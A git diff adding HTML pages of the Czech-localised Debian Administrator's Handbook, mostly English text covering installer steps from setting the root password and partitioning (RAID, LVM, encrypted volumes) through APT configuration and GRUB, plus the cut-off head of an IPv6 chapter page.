+                        class="emphasis"><em>SECURITY</em></span> Administrator password</strong></p></div></div></div><div
+              class="para">
+				The root user's password should be long (8 characters or more) and impossible to guess. Indeed, any computer (and a fortiori any server) connected to the Internet is regularly targeted by automated connection attempts with the most obvious passwords. Sometimes it may even be subject to dictionary attacks, in which many combinations of words and numbers are tested as password. Avoid using the names of children or parents, dates of birth, etc.: many of your co-workers might know them, and you rarely want to give them free access to the computer in question.
+			</div><div
+              class="para">
+				These remarks are equally applicable for other user passwords, but the consequences of a compromised account are less drastic for users without administrative rights.
+			</div><div
+              class="para">
+				If inspiration is lacking, do not hesitate to use password generators, such as <code
+                class="command">pwgen</code> (in the package of the same name).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.11"></a>4.2.10. Creating the First User</h3></div></div></div><div
+            class="para">
+				Debian also imposes the creation of a standard user account so that the administrator doesn't get into the bad habit of working as root. The precautionary principle essentially means that each task is performed with the minimum required rights, in order to limit the damage caused by human error. This is why the installer will ask for the complete name of this first user, their username, and their password (twice, to prevent the risk of erroneous input).
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.11.3"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-username.png"
+                  alt="Name of the first user" /></div></div><p
+              class="title"><strong>Obrázek 4.6. Name of the first user</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-clock-config"></a>4.2.11. Configuring the Clock</h3></div></div></div><div
+            class="para">
+				If the network is available, the system's internal clock is updated (in a one-shot way) from an NTP server. This way the timestamps on logs will be correct from the first boot. For them to remain consistently precise over time, an NTP daemon needs to be set up after initial installation (see <a
+              class="xref"
+              href="sect.config-misc.html#sect.time-synchronization">8.9.2 – „Time Synchronization“</a>).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-detect-disks"></a>4.2.12. Detecting Disks and Other Devices</h3></div></div></div><div
+            class="para">
+				This step automatically detects the hard drives on which Debian may be installed. They will be presented in the next step: partitioning.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-partman"></a>4.2.13. Starting the Partitioning Tool</h3></div></div></div><a
+            id="id-1.7.12.14.2"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Uses of partitioning</strong></p></div></div></div><div
+              class="para">
+				Partitioning, an indispensable step in installation, consists in dividing the available space on the hard drives (each subdivision thereof being called a “partition”) according to the data to be stored on it and the use for which the computer is intended. This step also includes choosing the filesystems to be used. All of these decisions will have an influence on performance, data security, and the administration of the server.
+			</div></div><div
+            class="para">
+				The partitioning step is traditionally difficult for new users. It is necessary to define the various portions of the disks (or “partitions”) on which the Linux filesystems and virtual memory (swap) will be stored. This task is complicated if another operating system that you want to keep is already on the machine. Indeed, you will then have to make sure that you do not alter its partitions (or that you resize them without causing damage).
+			</div><div
+            class="para">
+				Fortunately, the partitioning software has a “guided” mode which recommends partitions for the user to make — in most cases, you can simply validate the software's suggestions.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.14.6"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-partman.png"
+                  alt="Choice of partitioning mode" /></div></div><p
+              class="title"><strong>Obrázek 4.7. Choice of partitioning mode</strong></p></div><div
+            class="para">
+				The first screen in the partitioning tool offers the choice of using an entire hard drive to create various partitions. For a (new) computer which will solely use Linux, this option is clearly the simplest, and you can choose the option “Guided - use entire disk”. If the computer has two hard drives for two operating systems, setting one drive for each is also a solution that can facilitate partitioning. In both of these cases, the next screen offers to choose the disk where Linux will be installed by selecting the corresponding entry (for example, “SCSI3 (0,0,0) (sda) - 17.2 GB ATA VBOX HARDDISK”). You then start guided partitioning.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.14.8"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-partman-disk.png"
+                  alt="Disk to use for guided partitioning" /></div></div><p
+              class="title"><strong>Obrázek 4.8. Disk to use for guided partitioning</strong></p></div><div
+            class="para">
+				Guided partitioning can also set up LVM logical volumes instead of partitions (see below). Since the remainder of the operation is the same, we will not go over the option “Guided - use entire disk and set up LVM” (encrypted or not).
+			</div><div
+            class="para">
+				In other cases, when Linux must work alongside other already existing partitions, you need to choose manual partitioning.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-autopartman-mode"></a>4.2.13.1. Guided partitioning</h4></div></div></div><a
+              id="id-1.7.12.14.11.2"
+              class="indexterm"></a><div
+              class="para">
+					The guided partitioning tool offers three partitioning methods, which correspond to different usages.
+				</div><div
+              class="figure"><a
+                xmlns=""
+                id="id-1.7.12.14.11.4"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/inst-autopartman-mode.png"
+                    alt="Guided partitioning" /></div></div><p
+                class="title"><strong>Obrázek 4.9. Guided partitioning</strong></p></div><div
+              class="para">
+					The first method is called “All files in one partition”. The entire Linux system tree is stored in a single filesystem, corresponding to the root <code
+                class="filename">/</code> directory. This simple and robust partitioning fits perfectly for personal or single-user systems. In fact, two partitions will be created: the first will house the complete system, the second the virtual memory (swap).
+				</div><div
+              class="para">
+					The second method, “Separate <code
+                class="filename">/home/</code> partition”, is similar, but splits the file hierarchy in two: one partition contains the Linux system (<code
+                class="filename">/</code>), and the second contains “home directories” (meaning user data, in files and subdirectories available under <code
+                class="filename">/home/</code>).
+				</div><div
+              class="para">
+					The last partitioning method, called “Separate <code
+                class="filename">/home</code>, <code
+                class="filename">/var</code>, and <code
+                class="filename">/tmp</code> partitions”, is appropriate for servers and multi-user systems. It divides the file tree into many partitions: in addition to the root (<code
+                class="filename">/</code>) and user accounts (<code
+                class="filename">/home/</code>) partitions, it also has partitions for server software data (<code
+                class="filename">/var/</code>), and temporary files (<code
+                class="filename">/tmp/</code>). These divisions have several advantages. Users can not lock up the server by consuming all available hard drive space (they can only fill up <code
+                class="filename">/tmp/</code> and <code
+                class="filename">/home/</code>). The daemon data (especially logs) can no longer clog up the rest of the system.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> Choosing a filesystem</strong></p></div></div></div><a
+                id="id-1.7.12.14.11.8.2"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.11.8.3"
+                class="indexterm"></a><div
+                class="para">
+					A filesystem defines the way in which data is organized on the hard drive. Each existing filesystem has its merits and limitations. Some are more robust, others more effective: if you know your needs well, choosing the most appropriate filesystem is possible. Various comparisons have already been made; it seems that <span
+                  class="emphasis"><em>ReiserFS</em></span> is particularly efficient for reading many small files; <span
+                  class="emphasis"><em>XFS</em></span>, in turn, works faster with large files. <span
+                  class="emphasis"><em>Ext4</em></span>, the default filesystem for Debian, is a good compromise, based on the three previous versions of filesystems historically used in Linux (<span
+                  class="emphasis"><em>ext</em></span>, <span
+                  class="emphasis"><em>ext2</em></span> and <span
+                  class="emphasis"><em>ext3</em></span>). <span
+                  class="emphasis"><em>Ext4</em></span> overcomes certain limitations of <span
+                  class="emphasis"><em>ext3</em></span> and is particularly appropriate for very large capacity hard drives. Another option would be to experiment with the very promising <span
+                  class="emphasis"><em>btrfs</em></span>, which includes numerous features that require, to this day, the use of LVM and/or RAID.
+				</div><div
+                class="para">
+					A journalized filesystem (such as <span
+                  class="emphasis"><em>ext3</em></span>, <span
+                  class="emphasis"><em>ext4</em></span>, <span
+                  class="emphasis"><em>btrfs</em></span>, <span
+                  class="emphasis"><em>reiserfs</em></span>, or <span
+                  class="emphasis"><em>xfs</em></span>) takes special measures to make it possible to return to a prior consistent state after an abrupt interruption without completely analyzing the entire disk (as was the case with the <span
+                  class="emphasis"><em>ext2</em></span> system). This functionality is carried out by filling in a journal that describes the operations to conduct prior to actually executing them. If an operation is interrupted, it will be possible to “replay” it from the journal. Conversely, if an interruption occurs during an update of the journal, the last requested change is simply ignored; the data being written could be lost, but since the data on the disk has not changed, they have remained coherent. This is nothing more nor less than a transactional mechanism applied to the filesystem.
+				</div></div><div
+              class="para">
+					After choosing the type of partition, the software calculates a suggestion, and describes it on the screen; the user can then modify it if needed. You can, in particular, choose another filesystem if the standard choice (<span
+                class="emphasis"><em>ext4</em></span>) isn't appropriate. In most cases, however, the proposed partitioning is reasonable and it can be accepted by selecting the “Finish partitioning and write changes to disk” entry.
+				</div><div
+              class="figure"><a
+                xmlns=""
+                id="id-1.7.12.14.11.10"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/inst-partman-validation.png"
+                    alt="Validating partitioning" /></div></div><p
+                class="title"><strong>Obrázek 4.10. Validating partitioning</strong></p></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.manual-partitioning"></a>4.2.13.2. Manual Partitioning</h4></div></div></div><a
+              id="id-1.7.12.14.12.2"
+              class="indexterm"></a><div
+              class="para">
+					Manual partitioning allows greater flexibility, allowing the user to choose the purpose and size of each partition. Furthermore, this mode is unavoidable if you wish to use software RAID.
+				</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.shrinking-partition"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>IN PRACTICE</em></span> Shrinking a Windows partition</strong></p></div></div></div><a
+                id="id-1.7.12.14.12.4.2"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.12.4.3"
+                class="indexterm"></a><div
+                class="para">
+					To install Debian alongside an existing operating system (Windows or other), you must have some available hard drive space that is not being used by the other system in order to be able to create the partitions dedicated to Debian. In most cases, this means shrinking a Windows partition and reusing the freed space.
+				</div><div
+                class="para">
+					The Debian installer allows this operation when using the manual mode for partitioning. You only need to choose the Windows partition and enter its new size (this works the same with both FAT and NTFS partitions).
+				</div></div><div
+              class="para">
+					The first screen displays the available disks, their partitions, and any possible free space that has not yet been partitioned. You can select each displayed element; pressing the <span
+                class="keycap"><strong>Enter</strong></span> key then gives a list of possible actions.
+				</div><div
+              class="para">
+					You can erase all partitions on a disk by selecting it.
+				</div><div
+              class="para">
+					When selecting free space on a disk, you can manually create a new partition. You can also do this with guided partitioning, which is an interesting solution for a disk that already contains another operating system, but which you may wish to partition for Linux in a standard manner. See <a
+                class="xref"
+                href="sect.installation-steps.html#sect.install-autopartman-mode">4.2.13.1 – „Guided partitioning“</a> for more details on guided partitioning.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> Mount point</strong></p></div></div></div><a
+                id="id-1.7.12.14.12.8.2"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.12.8.3"
+                class="indexterm"></a><div
+                class="para">
+					The mount point is the directory tree that will house the contents of the filesystem on the selected partition. Thus, a partition mounted at <code
+                  class="filename">/home/</code> is traditionally intended to contain user data.
+				</div><div
+                class="para">
+					When this directory is named “<code
+                  class="filename">/</code>”, it is known as the <span
+                  class="emphasis"><em>root</em></span> of the file tree, and therefore the root of the partition that will actually host the Debian system.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> Virtual memory, swap</strong></p></div></div></div><a
+                id="id-1.7.12.14.12.9.2"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.12.9.3"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.12.9.4"
+                class="indexterm"></a><a
+                id="id-1.7.12.14.12.9.5"
+                class="indexterm"></a><div
+                class="para">
+					Virtual memory allows the Linux kernel, when lacking sufficient memory (RAM), to free a bit of storage by storing the parts of the RAM that have been inactive for some time on the swap partition of the hard disk.
+				</div><div
+                class="para">
+					To simulate the additional memory, Windows uses a swap file that is directly contained in a filesystem. Conversely, Linux uses a partition dedicated to this purpose, hence the term “swap partition”.
+				</div></div><div
+              class="para">
+					When choosing a partition, you can indicate the manner in which you are going to use it:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							format it and include it in the file tree by choosing a mount point;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							use it as a swap partition;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							make it into a “physical volume for encryption” (to protect the confidentiality of data on certain partitions, see below);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							make it a “physical volume for LVM” (this concept is discussed in greater detail later in this chapter);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							use it as a RAID device (see later in this chapter);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							you can also choose not to use it, and therefore leave it unchanged.
+						</div></li></ul></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-software-raid"></a>4.2.13.3. Configuring Multidisk Devices (Software RAID)</h4></div></div></div><a
+              id="id-1.7.12.14.13.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.13.3"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.13.4"
+              class="indexterm"></a><div
+              class="para">
+					Some types of RAID allow the duplication of information stored on hard drives to prevent data loss in the event of a hardware problem affecting one of them. Level 1 RAID keeps a simple, identical copy (mirror) of a hard drive on another drive, while level 5 RAID splits redundant data over several disks, thus allowing the complete reconstruction of a failing drive.
+				</div><div
+              class="para">
+					We will only describe level 1 RAID, which is the simplest to implement. The first step involves creating two partitions of identical size located on two different hard drives, and to label them “physical volume for RAID”.
+				</div><div
+              class="para">
+					You must then choose “Configure software RAID” in the partitioning tool to combine these two partitions into a new virtual disk and select “Create MD device” in the configuration screen. You then need to answer a series of questions about this new device. The first question asks about the RAID level to use, which in our case will be “RAID1”. The second question asks about the number of active devices — two in our case, which is the number of partitions that need to be included in this MD device. The third question is about the number of spare devices — 0; we have not planned any additional disk to take over for a possible defective disk. The last question requires you to choose the partitions for the RAID device — these would be the two that we have set aside for this purpose (make sure you only select the partitions that explicitly mention “raid”).
+				</div><div
+              class="para">
+					Back to the main menu, a new virtual “RAID” disk appears. This disk is presented with a single partition which can not be deleted, but whose use we can choose (just like for any other partition).
+				</div><div
+              class="para">
+					For further details on RAID functions, please refer to <a
+                class="xref"
+                href="advanced-administration.html#sect.raid-soft">12.1.1 – „Software RAID“</a>.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-lvm"></a>4.2.13.4. Configuring the Logical Volume Manager (LVM)</h4></div></div></div><a
+              id="id-1.7.12.14.14.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.14.3"
+              class="indexterm"></a><div
+              class="para">
+					LVM allows you to create “virtual” partitions that span over several disks. The benefits are twofold: the size of the partitions are no longer limited by individual disks but by their cumulative volume, and you can resize existing partitions at any time, possibly after adding an additional disk when needed.
+				</div><div
+              class="para">
+					LVM uses a particular terminology: a virtual partition is a “logical volume”, which is part of a “volume group”, or an association of several “physical volumes”. Each of these terms in fact corresponds to a “real” partition (or a software RAID device).
+				</div><a
+              id="id-1.7.12.14.14.6"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.14.7"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.14.8"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.14.9"
+              class="indexterm"></a><div
+              class="para">
+					This technique works in a very simple way: each volume, whether physical or logical, is split into blocks of the same size, which are made to correspond by LVM. The addition of a new disk will cause the creation of a new physical volume, and these new blocks can be associated to any volume group. All of the partitions in the volume group that is thus expanded will have additional space into which they can extend.
+				</div><div
+              class="para">
+					The partitioning tool configures LVM in several steps. First you must create on the existing disks the partitions that will be “physical volumes for LVM”. To activate LVM, you need to choose “Configure the Logical Volume Manager (LVM)”, then on the same configuration screen “Create a volume group”, to which you will associate the existing physical volumes. Finally, you can create logical volumes within this volume group. Note that the automatic partitioning system can perform all these steps automatically.
+				</div><div
+              class="para">
+					In the partitioning menu, each physical volume will appear as a disk with a single partition which can not be deleted, but that you can use as desired.
+				</div><div
+              class="para">
+					The usage of LVM is described in further detail in <a
+                class="xref"
+                href="advanced-administration.html#sect.lvm">12.1.2 – „LVM“</a>.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.7.12.14.15"></a>4.2.13.5. Setting Up Encrypted Partitions</h4></div></div></div><a
+              id="id-1.7.12.14.15.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.15.3"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.15.4"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.15.5"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.15.6"
+              class="indexterm"></a><a
+              id="id-1.7.12.14.15.7"
+              class="indexterm"></a><div
+              class="para">
+					To guarantee the confidentiality of your data, for instance in the event of the loss or theft of your computer or a hard drive, it is possible to encrypt the data on some partitions. This feature can be added underneath any filesystem, since, as for LVM, Linux (and more particularly the dm-crypt driver) uses the Device Mapper to create a virtual partition (whose content is protected) based on an underlying partition that will store the data in an encrypted form (thanks to LUKS, Linux Unified Key Setup, a standard format that enables the storage of encrypted data as well as meta-information that indicates the encryption algorithms used).
+				</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.encrypted-swap-partition"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> Encrypted swap partition</strong></p></div></div></div><div
+                class="para">
+					When an encrypted partition is used, the encryption key is stored in memory (RAM). Since retrieving this key allows the decryption of the data, it is of utmost importance to avoid leaving a copy of this key that would be accessible to the possible thief of the computer or hard drive, or to a maintenance technician. This is however something that can easily occur with a laptop, since when hibernating the contents of RAM is stored on the swap partition. If this partition isn't encrypted, the thief may access the key and use it to decrypt the data from the encrypted partitions. This is why, when you use encrypted partitions, it is imperative to also encrypt the swap partition!
+				</div><div
+                class="para">
+					The Debian installer will warn the user if they try to make an encrypted partition while the swap partition isn't encrypted.
+				</div></div><div
+              class="para">
+					To create an encrypted partition, you must first assign an available partition for this purpose. To do so, select a partition and indicate that it is to be used as a “physical volume for encryption”. After partitioning the disk containing the physical volume to be made, choose “Configure encrypted volumes”. The software will then propose to initialize the physical volume with random data (making the localization of the real data more difficult), and will ask you to enter an “encryption passphrase”, which you will have to enter every time you boot your computer in order to access the content of the encrypted partition. Once this step has been completed, and you have returned to the partitioning tool menu, a new partition will be available in an “encrypted volume”, which you can then configure just like any other partition. In most cases, this partition is used as a physical volume for LVM so as to protect several partitions (LVM logical volumes) with the same encryption key, including the swap partition (see sidebar <a
+                class="xref"
+                href="sect.installation-steps.html#sidebar.encrypted-swap-partition"><span
+                  class="emphasis"><em>SECURITY</em></span> Encrypted swap partition</a>).
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.15"></a>4.2.14. Installing the Base System</h3></div></div></div><a
+            id="id-1.7.12.15.2"
+            class="indexterm"></a><div
+            class="para">
+				This step, which doesn't require any user interaction, installs the Debian “base system” packages. This includes the <code
+              class="command">dpkg</code> and <code
+              class="command">apt</code> tools, which manage Debian packages, as well as the utilities necessary to boot the system and start using it.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.15.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-basesystem.png"
+                  alt="Installation of the base system" /></div></div><p
+              class="title"><strong>Obrázek 4.11. Installation of the base system</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.16"></a>4.2.15. Configuring the Package Manager (<code
+                    class="command">apt</code>)</h3></div></div></div><a
+            id="id-1.7.12.16.2"
+            class="indexterm"></a><a
+            id="id-1.7.12.16.3"
+            class="indexterm"></a><div
+            class="para">
+				In order to be able to install additional software, APT needs to be configured and told where to find Debian packages. This step is as automated as possible. It starts with a question asking if it must use a network source for packages, or if it should only look for packages on the CD-ROM.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Debian CD-ROM in the drive</strong></p></div></div></div><div
+              class="para">
+				If the installer detects a Debian installation disk in the CD/DVD reader, it is not necessary to configure APT to go looking for packages on the network: APT is automatically configured to read packages from a removable media drive. If the disk is part of a set, the software will offer to “explore” other disks in order to reference all of the packages stored on them.
+			</div></div><div
+            class="para">
+				If getting packages from the network is requested, the next two questions allow to choose a server from which to download these packages, by choosing first a country, then a mirror available in that country (a mirror is a public server hosting copies of all the files of the Debian master archive).
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.16.7"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-mirror.png"
+                  alt="Selecting a Debian mirror" /></div></div><p
+              class="title"><strong>Obrázek 4.12. Selecting a Debian mirror</strong></p></div><div
+            class="para">
+				Finally, the program proposes to use an HTTP proxy. If there is no proxy, Internet access will be direct. If you type <code
+              class="literal">http://proxy.falcot.com:3128</code>, APT will use the Falcot <span
+              class="foreignphrase"><em
+                class="foreignphrase">proxy/cache</em></span>, a “Squid” program. You can find these settings by checking the configurations of a web browser on another machine connected to the same network.
+			</div><div
+            class="para">
+				The files <code
+              class="filename">Packages.xz</code> and <code
+              class="filename">Sources.xz</code> are then automatically downloaded to update the list of packages recognized by APT.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> HTTP proxy</strong></p></div></div></div><a
+              id="id-1.7.12.16.10.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.16.10.3"
+              class="indexterm"></a><a
+              id="id-1.7.12.16.10.4"
+              class="indexterm"></a><a
+              id="id-1.7.12.16.10.5"
+              class="indexterm"></a><div
+              class="para">
+				An HTTP proxy is a server that forwards an HTTP request for network users. It sometimes helps to speed up downloads by keeping a copy of files that have been transferred through it (we then speak of proxy/cache). In some cases, it is the only means of accessing an external web server; in such cases it is essential to answer the corresponding question during installation for the program to be able to download the Debian packages through it.
+			</div><div
+              class="para">
+				Squid is the name of the server software used by Falcot Corp to offer this service.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.17"></a>4.2.16. Debian Package Popularity Contest</h3></div></div></div><div
+            class="para">
+				The Debian system contains a package called <span
+              class="pkg pkg">popularity-contest</span>, whose purpose is to compile package usage statistics. Each week, this program collects information on the packages installed and those used recently, and anonymously sends this information to the Debian project servers. The project can then use this information to determine the relative importance of each package, which influences the priority that will be granted to them. In particular, the most “popular” packages will be included in the installation CD-ROM, which will facilitate their access for users who do not wish to download them or to purchase a complete set.
+			</div><div
+            class="para">
+				This package is only activated on demand, out of respect for the confidentiality of users' usage.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.18"></a>4.2.17. Selecting Packages for Installation</h3></div></div></div><div
+            class="para">
+				The following step allows you to choose the purpose of the machine in very broad terms; the ten suggested tasks correspond to lists of packages to be installed. The list of the packages that will actually be installed will be fine-tuned and completed later on, but this provides a good starting point in a simple manner.
+			</div><div
+            class="para">
+				Some packages are also automatically installed according to the hardware detected (thanks to the program <code
+              class="command">discover-pkginstall</code> from the <span
+              class="pkg pkg">discover</span> package).
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.18.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-tasksel.png"
+                  alt="Task choices" /></div></div><p
+              class="title"><strong>Obrázek 4.13. Task choices</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.installing-grub"></a>4.2.18. Installing the GRUB Bootloader</h3></div></div></div><a
+            id="id-1.7.12.19.2"
+            class="indexterm"></a><a
+            id="id-1.7.12.19.3"
+            class="indexterm"></a><a
+            id="id-1.7.12.19.4"
+            class="indexterm"></a><div
+            class="para">
+				The bootloader is the first program started by the BIOS. This program loads the Linux kernel into memory and then executes it. It often offers a menu that allows the user to choose the kernel to load and/or the operating system to boot.
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.bootloader-dual-boot"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BEWARE</em></span> Bootloader and dual boot</strong></p></div></div></div><a
+              id="id-1.7.12.19.6.2"
+              class="indexterm"></a><div
+              class="para">
+				This phase in the Debian installation process detects the operating systems that are already installed on the computer, and automatically adds corresponding entries in the boot menu, but not all installation programs do this.
+			</div><div
+              class="para">
+				In particular, if you install (or reinstall) Windows thereafter, the bootloader will be erased. Debian will still be on the hard drive, but will no longer be accessible from the boot menu. You would then have to boot the Debian installation system in <strong
+                class="userinput"><code>rescue</code></strong> mode to set up a less exclusive bootloader. This operation is described in detail in the installation manual. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/stable/amd64/ch08s07.html">http://www.debian.org/releases/stable/amd64/ch08s07.html</a></div>
+			</div></div><div
+            class="para">
+				By default, the menu proposed by GRUB contains all the installed Linux kernels, as well as any other operating systems that were detected. This is why you should accept the offer to install it in the Master Boot Record. Since keeping older kernel versions preserves the ability to boot the same system if the most recently installed kernel is defective or poorly adapted to the hardware, it often makes sense to keep a few older kernel versions installed.
+			</div><div
+            class="para">
+				GRUB is the default bootloader installed by Debian thanks to its technical superiority: it works with most filesystems and therefore doesn't require an update after each installation of a new kernel, since it reads its configuration during boot and finds the exact position of the new kernel. Version 1 of GRUB (now known as “Grub Legacy”) couldn't handle all combinations of LVM and software RAID; version 2, installed by default, is more complete. There may still be situations where it is more recommendable to install LILO (another bootloader); the installer will suggest it automatically.
+			</div><div
+            class="para">
+				For more information on configuring GRUB, please refer to <a
+              class="xref"
+              href="sect.config-bootloader.html#sect.config-grub">8.8.3 – „GRUB 2 Configuration“</a>.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BEWARE</em></span> Bootloaders and architectures</strong></p></div></div></div><div
+              class="para">
+				LILO and GRUB, which are mentioned in this chapter, are bootloaders for <span
+                class="emphasis"><em>i386</em></span> and <span
+                class="emphasis"><em>amd64</em></span> architectures. If you install Debian on another architecture, you will need to use another bootloader. Among others, we can cite <code
+                class="command">yaboot</code> or <code
+                class="command">quik</code> for <span
+                class="emphasis"><em>powerpc</em></span>, <code
+                class="command">silo</code> for <span
+                class="emphasis"><em>sparc</em></span>, <code
+                class="command">aboot</code> for <span
+                class="emphasis"><em>alpha</em></span>, <code
+                class="command">arcboot</code> for <span
+                class="emphasis"><em>mips</em></span>.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.20"></a>4.2.19. Finishing the Installation and Rebooting</h3></div></div></div><div
+            class="para">
+				The installation is now complete, the program invites you to remove the CD-ROM from the reader and to restart the computer.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="installation.html"><strong>Předcházející</strong>Kapitola 4. Installation</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.after-first-boot.html"><strong>Další</strong>4.3. After the First Boot</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ipv6.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ipv6.html
new file mode 100644
index 000000000..c5351ea89
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ipv6.html
@@ -0,0 +1,221 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.5. IPv6</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.dynamic-routing.html"
+        title="10.4. Dynamic Routing" /><link
+        rel="next"
+        href="sect.domain-name-servers.html"
